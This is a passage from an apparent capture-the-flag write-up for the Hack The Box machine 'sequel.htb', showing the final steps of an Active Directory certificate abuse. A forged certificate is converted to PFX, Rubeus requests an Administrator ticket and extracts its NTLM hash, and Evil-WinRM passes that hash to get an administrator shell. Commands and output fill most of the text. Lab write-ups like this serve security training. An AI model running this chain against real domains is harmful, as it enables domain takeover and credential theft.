QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNv
bmZpZ3VyYXRpb24sREM9c2VxdWVsLERDPWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/
b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTANBgkqhkiG9w0BAQsF
AAOCAQEAIvqkH9ZyScrxMkkmyr13wMOiC5Qc3hDcZICNB/u3psd6T4Y7Qciz+Ku4
4TRG7h6w7xxwxr1QE+AOhpf1amS3/T4R/SpO2Q268hRx/7VVA7uWfzAjkDqN7gKR
pjfPK/0WmqxSOQdioU2hLSD9emN006iSk4NsdNvJ+MOvWJ5SWDY6nLhk4orqxPWI
uYwrQBMwNabszLMX691ICtzURX1Rr/QXyim/VieFt4uxEVXwSaimdei5jkMfWktJ
uiUd1RFdxMLkVL/fbXV4PSoa2Vw8E2Iv0ByPLFM6S1SsOHJylXm8lhm8L8YT3IBZ
RISErRaeptNkB/cE8a1vflaMBrJWlQ==
-----END CERTIFICATE-----


[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx



Certify completed in 00:00:03.7660303

Now we have the private key and certificate, let’s save the key & cert in one file. Run the below command to convert pem to pfx

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx🔥\> openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password:
Verifying - Enter Export Password:

Set the password, it will be used in next step. Upload PFX file.

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> upload cert.pfx
Info: Uploading cert.pfx to C:\Users\Ryan.Cooper\Documents\cert.pfx


Data: 4564 bytes of 4564 bytes copied

Info: Upload successful!

Upload Rubeus.exe binary on to the target and request TGT.

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> ./rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /password:12345 /ptt /getcredentials

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.0

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\Administrator'
[+] TGT request successful!
[*] base64(ticket.kirbi):

      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
[+] Ticket successfully imported!

  ServiceName              :  krbtgt/sequel.htb
  ServiceRealm             :  SEQUEL.HTB
  UserName                 :  Administrator
  UserRealm                :  SEQUEL.HTB
  StartTime                :  3/5/2023 9:28:00 AM
  EndTime                  :  3/5/2023 7:28:00 PM
  RenewTill                :  3/12/2023 10:28:00 AM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable
  KeyType                  :  rc4_hmac
  Base64(key)              :  zh2bUJz9yA4JqeInN3AgwQ==
  ASREP (key)              :  D116C4E4A154340E7D1A598B92B471C1

[*] Getting credentials using U2U

  CredentialInfo         :
    Version              : 0
    EncryptionType       : rc4_hmac
    CredentialData       :
      CredentialCount    : 1
       NTLM              : A52F78E4C751E5F5E17E1E9F3E58F4EE

Now we have the Administrator NTLM hash, we can pass the hash to gain shell via WINRM.

🔥\> evil-winrm -i sequel.htb -u Administrator -H A52F78E4C751E5F5E17E1E9F3E58F4EE

Evil-WinRM shell v3.4

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
sequel\administrator

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeMachineAccountPrivilege                 Add workstations to domain                                         Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeEnableDelegationPrivilege               Enable computer and user accounts to be trusted for delegation     Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled

We successfully root the machine.

From Misconfigured Certificate Template to Domain Admin - Red Team Notes

AD Certificates - HackTricks